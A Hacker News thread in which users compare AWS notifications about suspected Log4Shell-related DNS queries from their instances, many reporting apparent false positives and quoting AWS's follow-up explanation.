Hacker News new | past | comments | ask | show | jobs | submit login
Tell HN: AWS warns us about irregular activity related to Log4shell
143 points by stunt on Dec 18, 2021 | hide | past | favorite | 23 comments
We received a few emails from AWS about irregular activity related to Log4shell. I asked a few friends, and they got similar messages as well.

AWS provided a list of EC2 instances where they saw DNS queries which are typically used when targeting the log4j vulnerability, but they did not provide further information.

Have you received similar notification? What have you done about suspicious instances?

The ironic part is that AWS did that on Friday while half of the internet was making memes about the fact that the Log4j vulnerability was disclosed on Friday.




I think this is what AWS GuardDuty is supposed to do?

Edit: https://aws.amazon.com/blogs/security/using-aws-security-ser...

GuardDuty In addition to finding the presence of this vulnerability through Inspector, the Amazon GuardDuty team has also begun adding indicators of compromise associated with exploiting the Log4j vulnerability, and will continue to do so. GuardDuty will monitor for attempts to reach known-bad IP addresses or DNS entries, and can also find post-exploit activity through anomaly-based behavioral findings. For example, if an Amazon EC2 instance starts communicating on unusual ports, GuardDuty would detect this activity and create the finding Behavior:EC2/NetworkPortUnusual. This activity is not limited to the NetworkPortUnusual finding, though. GuardDuty has a number of different findings associated with post exploit activity that might be seen in response to a compromised AWS resource. For a list of GuardDuty findings, please refer to this GuardDuty documentation.


We received this as well except

1. We don’t use Java 2. The instances in the email are not in our accounts

We later received another email providing some vague reasons for this…

On a Friday evening I was not very happy spending time trying to hunt down the invalid instances


We received notifications for instances that do not and have never run java as well. These instances don't provide DNS resolution for any other hosts or act as proxies. I'm curious if there was some data corruption on the AWS side.


We also received that email, but it was also followed up by one of our TAMs. For some inexplicable reason, the instance IDs in the email are their AWS internal IDs and is not visible to us, so it's actually pretty useless. They followed up and gave the actual instance for us to investigate, but we think it's a false positive as there is no Java on that instance.


I had it relating to images in ECR, and similarly spent a while hunting them down. They were in my account, but surely the email could've told me which region, or even linked them directly!


Wow... I'd be curious as to whether or not this has occurred to anyone else. What were the vague reasons?


We had a non-AWS false positive: when sending the log4j exploit string with prepared unique subdomain via email there was an anti-spam system which did a DNS request on the subdomain. Apparently it looks for any content remotely looking like a URL and probes it. Similar to what was reported about Protonmail here https://news.ycombinator.com/item?id=29537549


It happened to us too.

There's no JVM (or log4j) in our environment, but we received this notification listing 6 instance IDs as having done DNS lookups to suspect domains.

No trace of those instance IDs in our account over the past few weeks, and after following up with a ticket we were told they're actually the instance IDs that sit underneath some fargate tasks (no info on what tasks or ECS service of course, because that would be sensible).

We've rechecked the bits of our stack that run on Fargate and confirmed there's definitely no JVM, so we figure it must be a false positive. Maybe DNS lookups to customer controlled hostnames (which we support as part of a feature, and sandbox carefully).


Here it is below - for us it was #4 which i should clearify was not vague just my tired memory of it - since once i received this i was very relieved and proceeded to sleep. I can tell they are definitely trying and IMO doing the right thing with their efforts below was the followup email that let us get sleep.

Earlier today, we provided you a notification with a list of instances that may still be running a version of log4j that has a known security vulnerability and needs to be patched. We want to provide you additional details about that email.

The list of instances was obtained by monitoring for specific DNS queries which are typically used when targeting the log4j vulnerability. These DNS lookups can indicate that someone is attempting to exploit the log4j vulnerability on your instance. Each of the instances provided has made a DNS lookup to one of the suspect domains between 12:00 AM and 11:59 PM PST on December 16th 2021. While we are not able to tell whether the instance was compromised, we strongly recommend that you take action to update log4j across all of your Java environments, whether they are publicly accessible or not.

In some cases, the list of instances included instance IDs that may not currently be present within your EC2 environment. This happened for a number of reasons:

1. EC2 instances may have been terminated since the scan was completed at 11:59 AM PST on December 16th 2021;

2. EC2 instances that have been stopped and restarted may appear with the incorrect instance ID;

3. ECS, EKS, and Fargate containers have been included with the underlying instance ID instead of the container ID;

4. EC2 instances used by underlying network services were erroneously included in the list of instances. These services are not themselves running unpatched log4j, but can be indicative of these DNS queries coming from within your VPC.

While it is not always possible for us to pinpoint the exact instances making these DNS queries, it is critically important that you patch all Java environments for the log4j issue, whether they are publicly accessible or not. To help you, we are also providing a 15-day free trial to Amazon Inspector which can assist you in finding vulnerable resources by scanning your Amazon Elastic Compute Cloud (EC2) instances and container images for the log4j vulnerability.

Please take the steps explained in this security blog post [1] to protect your resources. You also can find more information about log4j in our security bulletin [2].

If you have any questions or concerns, please reach out to AWS Support [3].

[1] https://aws.amazon.com/blogs/security/using-aws-security-ser... [2] https://aws.amazon.com/security/security-bulletins/AWS-2021-... [3] https://console.aws.amazon.com/support


We received this. We have no Java.

The notification from AWS referenced an instance we don’t have.

Some clarification from AWS would be nice. It made me wonder if it was related to an ELB or something.


The one we received stated we were notified because "your account has container images stored in Amazon Elastic Container Registry (ECR)". Currently, we do not use ECR, and if there was anything using ECR, it was from a previous devs that worked on PoCs never making it to production.

I have no experience with ECR, but because of this, I've had to stop what I was doing to look into something for several hours just to CYA that unused, but undead/legacy data wasn't leaving us vulnerable. 'Cause that's how we all want to spend weekends.


I replied above, but the instance ID they sent in the email are their own internal references to your instance, and there appears to be no way of converting that internal ID to one that's useful to you. I'd raise a support case if you don't have a TAM to ask.


This seems so stupid to have to correlate the two. AWS really is a hotch potch mess...


If I got the same (I have not seen the same for my AWS accounts), I would start capturing DNS traffic ASAP. Either at the VPC or host level. Cheap and easy to do most of the time

If not running Java (including agents), it may indicate some other type of compromise. Not something you should really ignore. Look at logs, cpu, disk, port usage just to start


All of this tells me that the number of possible vulns x the number of startups/companies managing their EC2 x numbers of OSes, libraries and platforms… Our current Internet is in an appalling state of security and keeping up to date will require tethering our OSes to something central that manages security upgrades very fast…


Real prioritization of software security (or quality for that matter) would require a radical rethink of our current software practices. It would be too costly, no one is ready to pay for it, so instead we hobble along with the current clusterfuck. As long as the current approach doesn't lose anyone billions of dollars, it will be deemed good enough (and even if it does, the cost of a secure rewrite of everything would probably be closer to trillions, not billions).


So, communist security? Be damned any that have other dependencies, you will all get the same. The fruits of your labour will be shared amongst all for the security of all.


Just a theory but it might be from an ssh user where the log4j string somehow resolves in a reverse dns lookup from the originating ip. Even when the login fails the lookup will be done.


I'm under the impression AWS in general proactively scans/monitors for (some) vulnerabilites on its infrastructure and notifies it customers.

Years ago I once received a warning regarding a potential exposure. I don't think it is very extensive, and in our case it wasn't a big deal, but I considered that notification back then a pretty "high level of service". Yes, such a notification can be scary, but better a little scare than having your systems compromised. This post on HN is reassurig that AWS tries to keep it that way. (We didn't get the Log4Shell warning as we're not vulnerable afaict)


Maybe it's just advertising using this period to point at products like GuardDuty. These are golden times for most vendors and suppliers of anything Security related.


Being a new and highly visible Target, maybe AWS sent out for positive emails when it saw an attempt on your VM? Or maybe one of AWS's DNS servers was listed by AWS as being used by hackers, and your own VM happened to use AWS DNS resolution?

Just some thoughts. Sucks to lose time, but the notices probably helped more than it hurt? Part of the price of modern defense to get false positives...

If I get a suspicious instance, I usually snapshot the disk and blow it away. We don't have a lot of resources for investigation, but we'd probably look at what we can get from logs, check scope of damage, and likely move on... We only run instances when we have no other choice, so they generally are pushed data, with no real pull access.


Yeah, we got one saying our ECR images MAY be vulnerable. But everything else in the email made it sound quite urgent.


I noticed that Docker Hub is now showing whether images have Log4j vulnerabilities: https://hub.docker.com/_/ubuntu?tab=tags

  latest | Log4Shell CVE not detected




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: